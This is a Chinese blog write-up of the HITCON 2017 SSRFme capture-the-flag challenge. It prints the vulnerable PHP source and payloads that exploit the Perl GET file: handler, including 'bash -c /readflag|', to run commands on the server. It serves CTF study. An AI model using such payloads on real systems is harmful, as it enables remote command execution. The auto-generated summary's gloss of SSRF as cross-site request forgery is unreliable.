BUU-WEB-[HITCON 2017]SSRFme

该博客详细讲述了PHP代码中的跨站请求伪造(SSRF)漏洞,通过构造恶意URL,作者展示了如何利用HTTP_X_FORWARDED_FOR头获取主机IP,并结合MD5加密实现路径绕过,最终成功读取/readflag文件。攻击者利用这种技术获取了flag。关键在于理解文件权限和路径控制在SSRF中的重要性。
摘要由CSDN通过智能技术生成

[HITCON 2017]SSRFme

在这里插入图片描述

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);
?>

第一个if函数得到本机的ip,然后与orange一起进行md5加密。
通过url参数输入的内容会以GET命令执行,执行的结果保存到filename参数的值命名的文件里。

尝试读取根目录,将结果保存进test文件中。
构建payload:

/?url=/&filename=test

test保存在sandbox/下,然后将orange和主机ip进行32位md5加密。
在这里插入图片描述
在这里插入图片描述
可以看出下一步是读取readflag。
直接读取/readflag是不可以的,这样会将文件创建至根目录底下,而不是相对于所存页面的相对根目录。所以通过bash -c /readflag达到一个./readflag的作用。
构建payload:

?url=file:bash -c /readflag|&filename=test

访问目标地址,即可得到flag。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值